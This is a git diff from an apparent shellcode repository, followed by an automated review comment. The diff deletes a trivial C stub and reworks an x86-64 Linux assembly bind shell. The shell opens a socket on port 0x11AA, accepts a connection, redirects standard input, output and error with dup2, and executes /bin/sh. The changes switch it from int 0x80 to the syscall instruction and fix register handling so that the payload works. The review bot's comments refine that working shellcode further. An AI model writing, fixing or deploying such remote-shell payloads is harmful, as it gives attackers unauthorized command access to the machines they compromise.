Diffstat (limited to 'shellcode')
-rw-r--r-- | shellcode/simple.c | 11 | ||||
-rw-r--r-- | shellcode/socket_x64.asm | 43 |
2 files changed, 22 insertions, 32 deletions
diff --git a/shellcode/simple.c b/shellcode/simple.c
deleted file mode 100644
index bf2bf43..0000000
--- a/shellcode/simple.c
+++ /dev/null
@@ -1,11 +0,0 @@
-/*
- * gcc -c -Wall -fpic -Os shellcode.c -o shellcode.o
- * ld -N -Ttext 0x0 -e _start -Map shellcode.map shellcode.o -o shellcode
- * objcopy -R .note -R .comment -S -O binary shellcode shellcode.bin
- */
-
-int _start(void) {
- while (1) {
- }
- return (0);
-}
diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm
index 131fefa..1ec36b0 100644
--- a/shellcode/socket_x64.asm
+++ b/shellcode/socket_x64.asm
@@ -8,66 +8,67 @@ xor rdx,rdx
 mov dil,0x2 ; AF_INET
 mov sil,0x1 ; SOCK_STREAM
 mov al,0x29 ; socket() syscall
-int 0x80 ; let the kernel do the stuff
+syscall
 mov rdi,rax ; save sockfd (used as argument for future calls)
 
 ; bind()
 xor rax,rax
-xor rdi,rdi
-xor rsi,rsi
 push rax ; sockaddr_in: in_addr = 0
 push word 0x11AA ; sockaddr_in: tcp port
 push word 0x2 ; sockaddr_in: sa_family = AF_INET
 mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in)
-mov rdx,0x10 ; addrlen
+mov dl,0x10 ; addrlen
 mov al,0x31 ; bind() syscall
-int 0x80 ; kernel mode
+syscall
 
 ; listen()
 xor rax,rax
 xor rsi,rsi ; zero rsi (arg2 -> backlog)
 mov al,0x32 ; listen() syscall
-int 0x80
+syscall
 
 ; accept()
 xor rax,rax
 push rax ; sockaddr_in: in_addr = 0
-push word ax ; sockaddr_in: tcp_port = 0
+push word 0x11AA ; sockaddr_in: tcp_port = 0
 push word 0x2 ; sockaddr_in: sa_family = AF_INET
 mov rsi,rsp ; save stack pointer (pointer to struct sockaddr_in)
+push 0x10 ; addr_len
+mov rdx,rsp ; pointer to upeer_addrlen
 mov al,0x2B ; accept() syscall
-int 0x80
+syscall
+
+mov rdi,rax ; save clientfd
 
 ; dup2()
-xor rcx,rcx
-mov cl,0x3 ; loop count
+xor rdx,rdx
+mov dl,0x3
 dupes:
-xor rsi,rsi
-dec cl ; loop var
-mov rsi,rcx ; loop var -> newfd
+mov rsi,rdx
+dec rsi
 xor rax,rax
-mov al,0x21 ; dup2() syscall
-int 0x80
-inc cl
-loop dupes
+mov al,0x21
+syscall
+dec dl
+jnz dupes
 
 ; exec
 mov rax,0x68732f6e69622f2f ; string 'hs/nib//'
 push rax ; push the string onto the stack
-mov rdi,rsp ; arg1 = pointer to string
 xor rax,rax
+mov byte [rsp + 8],al ; null-terminate the string
+mov rdi,rsp ; arg1 = pointer to string
 push rax ; arg2 = null
 mov rsi,rsp
 push rax ; arg3 = null
 mov rdx,rsp
-mov byte [esp + 8],al ; null-terminate the string
 mov al,0x3b ; exec() syscall
-int 0x80
+syscall
 
 ; exit()
 xor rax,rax
 xor rdi,rdi
 mov dil,0x42 ; return code (66d)
 mov al,0x3c ; exit() syscall
-int 0x80
+syscall
|
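Review bot: The accept() block's comment no longer matches its operand: `push word 0x11AA ; sockaddr_in: tcp_port = 0` now pushes the bind port while the comment still claims zero, and since accept() only writes into this buffer the comment should become `; sockaddr_in: sin_port (output buffer, initial value unused)` or the push should be a zero as the old `push word ax` was. The dup2 loop's counter moved from cl to dl with no reason recorded; `syscall` clobbers rcx and r11, so a counter in rcx would not survive the call, and `xor rdx,rdx ; counter in rdx, not rcx: syscall clobbers rcx/r11` makes that explicit for the next reader. `push 0x10 ; addr_len` pushes a qword of which the kernel reads only the low dword as socklen_t through the pointer set by `mov rdx,rsp`; saying so in the comment prevents a later "fix" to a dword push. `mov dl,0x10 ; addrlen` also depends on the upper bits of rdx still being zero from the `xor rdx,rdx` in the hunk header, which precedes the hunk together with the rest of the socket() setup; a file header stating the Linux x86-64 syscall ABI and the syscall numbers this file uses (0x29, 0x31, 0x32, 0x2B, 0x21, 0x3b, 0x3c) belongs at the top of the file, outside this hunk.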